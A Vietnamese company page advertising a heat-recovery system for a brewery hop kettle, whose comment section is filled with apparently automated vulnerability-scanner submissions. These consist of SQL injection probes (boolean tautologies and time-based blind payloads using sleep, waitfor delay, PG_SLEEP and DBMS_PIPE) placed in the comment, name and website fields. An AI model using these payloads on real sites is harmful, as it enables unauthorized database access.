Hệ thống thu hồi nhiệt thừa từ Nồi Sôi Hoa năm 2009

Đăng bởi admin 09/02/2017 69 Bình luận

Chúng tôi cung cấp giải pháp và thiết bị thu hồi nhiệt thừa từ Nồi sôi Hoa trong nhà máy Bia

Hình ảnh Bồn tích trữ nhiệt 2.000.000 Kcal dung tích 100m3

Hình ảnh thi công lắp đặt tháp thu hồi nhiệt thải từ nồi sôi hoa

69 Bình luận

tMtFQiRt:
17/08/2020, 09:34:30 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:34:46 AM

1

tMtFQiRt:
17/08/2020, 09:36:10 AM

1

tMtFQiRt:
17/08/2020, 09:36:20 AM

1

tMtFQiRt:
17/08/2020, 09:38:58 AM

1

tMtFQiRt:
17/08/2020, 09:39:00 AM

1

tMtFQiRt:
17/08/2020, 09:40:11 AM

1

tMtFQiRt:
17/08/2020, 09:40:19 AM

1

tMtFQiRt:
17/08/2020, 09:41:31 AM

1

tMtFQiRt:
17/08/2020, 09:41:36 AM

1

tMtFQiRt:
17/08/2020, 09:41:40 AM

-1 OR 2+392-392-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:41:41 AM

-1 OR 3+392-392-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:41:44 AM

-1 OR 2+692-692-1=0+0+0+1

tMtFQiRt:
17/08/2020, 09:41:45 AM

-1 OR 3+692-692-1=0+0+0+1

tMtFQiRt:
17/08/2020, 09:41:47 AM

-1' OR 2+457-457-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:41:50 AM

-1' OR 3+457-457-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:41:52 AM

-1' OR 2+453-453-1=0+0+0+1 or 'CZJ4kTkR'='

tMtFQiRt:
17/08/2020, 09:41:56 AM

-1' OR 3+453-453-1=0+0+0+1 or 'CZJ4kTkR'='

tMtFQiRt:
17/08/2020, 09:41:57 AM

-1" OR 2+922-922-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:42:00 AM

-1" OR 3+922-922-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:42:02 AM

if(now()=sysdate(),sleep(15),0)

tMtFQiRt:
17/08/2020, 09:42:04 AM

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

tMtFQiRt:
17/08/2020, 09:42:17 AM

1 waitfor delay '0:0:15' --

tMtFQiRt:
17/08/2020, 09:42:21 AM

6w9WBRQ5'; waitfor delay '0:0:15' --

tMtFQiRt:
17/08/2020, 09:42:26 AM

-5 OR 374=(SELECT 374 FROM PG_SLEEP(15))--

tMtFQiRt:
17/08/2020, 09:42:39 AM

-5) OR 389=(SELECT 389 FROM PG_SLEEP(15))--

tMtFQiRt:
17/08/2020, 09:42:42 AM

-1)) OR 585=(SELECT 585 FROM PG_SLEEP(15))--

tMtFQiRt:
17/08/2020, 09:42:47 AM

FEXwnQqf' OR 54=(SELECT 54 FROM PG_SLEEP(15))--

tMtFQiRt:
17/08/2020, 09:42:58 AM

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

tMtFQiRt:
17/08/2020, 09:43:02 AM

1'"

tMtFQiRt:
17/08/2020, 09:43:07 AM

@@oAyN3

tMtFQiRt:
17/08/2020, 09:43:10 AM

1

tMtFQiRt:
17/08/2020, 09:43:14 AM

1

tMtFQiRt:
17/08/2020, 09:44:05 AM

1

tMtFQiRt:
17/08/2020, 09:44:08 AM

1

-1 OR 2+329-329-1=0+0+0+1 --:
17/08/2020, 09:44:12 AM

1

-1 OR 3+329-329-1=0+0+0+1 --:
17/08/2020, 09:44:13 AM

1

-1 OR 2+158-158-1=0+0+0+1:
17/08/2020, 09:44:15 AM

1

-1 OR 3+158-158-1=0+0+0+1:
17/08/2020, 09:44:17 AM

1

-1' OR 2+920-920-1=0+0+0+1 --:
17/08/2020, 09:44:22 AM

1

-1' OR 3+920-920-1=0+0+0+1 --:
17/08/2020, 09:44:26 AM

1

-1' OR 2+782-782-1=0+0+0+1 or 'cP7TpKAm'=':
17/08/2020, 09:44:28 AM

1

-1' OR 3+782-782-1=0+0+0+1 or 'cP7TpKAm'=':
17/08/2020, 09:44:29 AM

1

-1" OR 2+671-671-1=0+0+0+1 --:
17/08/2020, 09:44:31 AM

1

-1" OR 3+671-671-1=0+0+0+1 --:
17/08/2020, 09:44:34 AM

1

XMlGPxMD'; waitfor delay '0:0:15' --:
17/08/2020, 09:44:48 AM

1

K0NNNlXk' OR 121=(SELECT 121 FROM PG_SLEEP(15))--:
17/08/2020, 09:44:50 AM

1

Jn1M8Zb1') OR 81=(SELECT 81 FROM PG_SLEEP(15))--:
17/08/2020, 09:44:52 AM

1

1'":
17/08/2020, 09:44:58 AM

1

@@LuAQp:
17/08/2020, 09:45:02 AM

1

tMtFQiRt:
17/08/2020, 09:45:06 AM

1

tMtFQiRt:
17/08/2020, 09:45:10 AM

1

tMtFQiRt:
17/08/2020, 09:45:54 AM

1

tMtFQiRt:
17/08/2020, 09:46:00 AM

1

tMtFQiRt:
17/08/2020, 09:46:03 AM

1

tMtFQiRt:
17/08/2020, 09:46:05 AM

1

tMtFQiRt:
17/08/2020, 09:46:07 AM

1

tMtFQiRt:
17/08/2020, 09:46:08 AM

1

tMtFQiRt:
17/08/2020, 09:46:09 AM

1

tMtFQiRt:
17/08/2020, 09:46:11 AM

1

tMtFQiRt:
17/08/2020, 09:46:17 AM

1

tMtFQiRt:
17/08/2020, 09:46:19 AM

1

tMtFQiRt:
17/08/2020, 09:46:21 AM

1

tMtFQiRt:
17/08/2020, 09:46:23 AM

1

tMtFQiRt:
17/08/2020, 09:46:24 AM

1

tMtFQiRt:
17/08/2020, 09:46:27 AM

1

tMtFQiRt:
17/08/2020, 09:46:32 AM

1

tMtFQiRt:
17/08/2020, 09:46:38 AM

1

tMtFQiRt:
17/08/2020, 09:46:47 AM

1

tMtFQiRt:
17/08/2020, 09:46:55 AM

1

tMtFQiRt:
17/08/2020, 09:47:01 AM

1

tMtFQiRt:
17/08/2020, 09:37:21 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:37:27 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:38:36 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:38:38 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:39:25 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:39:34 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:39:36 AM, www.vulnweb.com
Trả lời

-1 OR 2+38-38-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:37 AM, www.vulnweb.com
Trả lời

-1 OR 3+38-38-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:42 AM, www.vulnweb.com
Trả lời

-1 OR 2+494-494-1=0+0+0+1

tMtFQiRt:
17/08/2020, 09:39:43 AM, www.vulnweb.com
Trả lời

-1 OR 3+494-494-1=0+0+0+1

tMtFQiRt:
17/08/2020, 09:39:45 AM, www.vulnweb.com
Trả lời

-1' OR 2+34-34-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:48 AM, www.vulnweb.com
Trả lời

-1' OR 3+34-34-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:50 AM, www.vulnweb.com
Trả lời

-1' OR 2+962-962-1=0+0+0+1 or 'vDHBaKjz'='

tMtFQiRt:
17/08/2020, 09:39:51 AM, www.vulnweb.com
Trả lời

-1' OR 3+962-962-1=0+0+0+1 or 'vDHBaKjz'='

tMtFQiRt:
17/08/2020, 09:39:52 AM, www.vulnweb.com
Trả lời

-1" OR 2+819-819-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:53 AM, www.vulnweb.com
Trả lời

-1" OR 3+819-819-1=0+0+0+1 --

tMtFQiRt:
17/08/2020, 09:39:56 AM, www.vulnweb.com
Trả lời

if(now()=sysdate(),sleep(15),0)

tMtFQiRt:
17/08/2020, 09:40:01 AM, www.vulnweb.com
Trả lời

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

tMtFQiRt:
17/08/2020, 09:40:04 AM, www.vulnweb.com
Trả lời

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

tMtFQiRt:
17/08/2020, 09:40:09 AM, www.vulnweb.com
Trả lời

1 waitfor delay '0:0:15' --

tMtFQiRt:
17/08/2020, 09:40:25 AM, www.vulnweb.com
Trả lời

u0z7NjyQ')) OR 857=(SELECT 857 FROM PG_SLEEP(15))--

tMtFQiRt:
17/08/2020, 09:40:30 AM, www.vulnweb.com
Trả lời

1'"

tMtFQiRt:
17/08/2020, 09:40:36 AM, www.vulnweb.com
Trả lời

@@p4of6

tMtFQiRt:
17/08/2020, 09:40:39 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:40:46 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:41:41 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:41:44 AM, www.vulnweb.com
Trả lời

e

-1 OR 2+132-132-1=0+0+0+1 --:
17/08/2020, 09:41:49 AM, www.vulnweb.com
Trả lời

e

-1 OR 3+132-132-1=0+0+0+1 --:
17/08/2020, 09:41:51 AM, www.vulnweb.com
Trả lời

e

-1 OR 2+550-550-1=0+0+0+1:
17/08/2020, 09:41:53 AM, www.vulnweb.com
Trả lời

e

-1 OR 3+550-550-1=0+0+0+1:
17/08/2020, 09:41:56 AM, www.vulnweb.com
Trả lời

e

-1' OR 2+717-717-1=0+0+0+1 --:
17/08/2020, 09:41:58 AM, www.vulnweb.com
Trả lời

e

-1' OR 3+717-717-1=0+0+0+1 --:
17/08/2020, 09:42:00 AM, www.vulnweb.com
Trả lời

e

-1' OR 2+423-423-1=0+0+0+1 or 'PgZQrxvM'=':
17/08/2020, 09:42:02 AM, www.vulnweb.com
Trả lời

e

-1' OR 3+423-423-1=0+0+0+1 or 'PgZQrxvM'=':
17/08/2020, 09:42:03 AM, www.vulnweb.com
Trả lời

e

-1" OR 2+87-87-1=0+0+0+1 --:
17/08/2020, 09:42:05 AM, www.vulnweb.com
Trả lời

e

-1" OR 3+87-87-1=0+0+0+1 --:
17/08/2020, 09:42:06 AM, www.vulnweb.com
Trả lời

e

if(now()=sysdate(),sleep(15),0):
17/08/2020, 09:42:09 AM, www.vulnweb.com
Trả lời

e

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
17/08/2020, 09:42:11 AM, www.vulnweb.com
Trả lời

e

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
17/08/2020, 09:42:13 AM, www.vulnweb.com
Trả lời

e

cWdyXqk1'; waitfor delay '0:0:15' --:
17/08/2020, 09:42:24 AM, www.vulnweb.com
Trả lời

e

1'":
17/08/2020, 09:42:50 AM, www.vulnweb.com
Trả lời

e

@@5EYOk:
17/08/2020, 09:42:56 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:42:59 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:03 AM, www.vulnweb.com
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:05 AM, -1 OR 2+29-29-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:08 AM, -1 OR 3+29-29-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:11 AM, -1 OR 2+102-102-1=0+0+0+1
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:12 AM, -1 OR 3+102-102-1=0+0+0+1
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:14 AM, -1' OR 2+276-276-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:15 AM, -1' OR 3+276-276-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
Trả lời

e

tMtFQiRt:
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:21 AM, -1" OR 2+79-79-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:23 AM, -1" OR 3+79-79-1=0+0+0+1 --
Trả lời

e

tMtFQiRt:
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:37 AM, 1 waitfor delay '0:0:15' --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:40 AM, 2ll0MYbO'; waitfor delay '0:0:15' --
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:53 AM, 1'"
Trả lời

e

tMtFQiRt:
17/08/2020, 09:43:56 AM, @@gMcnh
Trả lời

e

tMtFQiRt:
17/08/2020, 09:45:23 AM, www.vulnweb.com
Trả lời

1

tMtFQiRt:
17/08/2020, 09:45:24 AM, www.vulnweb.com
Trả lời

1

tMtFQiRt:
17/08/2020, 09:45:26 AM, www.vulnweb.com
Trả lời

1

tMtFQiRt:
17/08/2020, 09:45:44 AM, www.vulnweb.com
Trả lời

1

tMtFQiRt:
17/08/2020, 09:45:48 AM, www.vulnweb.com
Trả lời

1

tMtFQiRt:
17/08/2020, 09:45:58 AM, www.vulnweb.com
Trả lời

1

Tiêu đề bình luận

Loading...
Loading...
Loading...
Loading...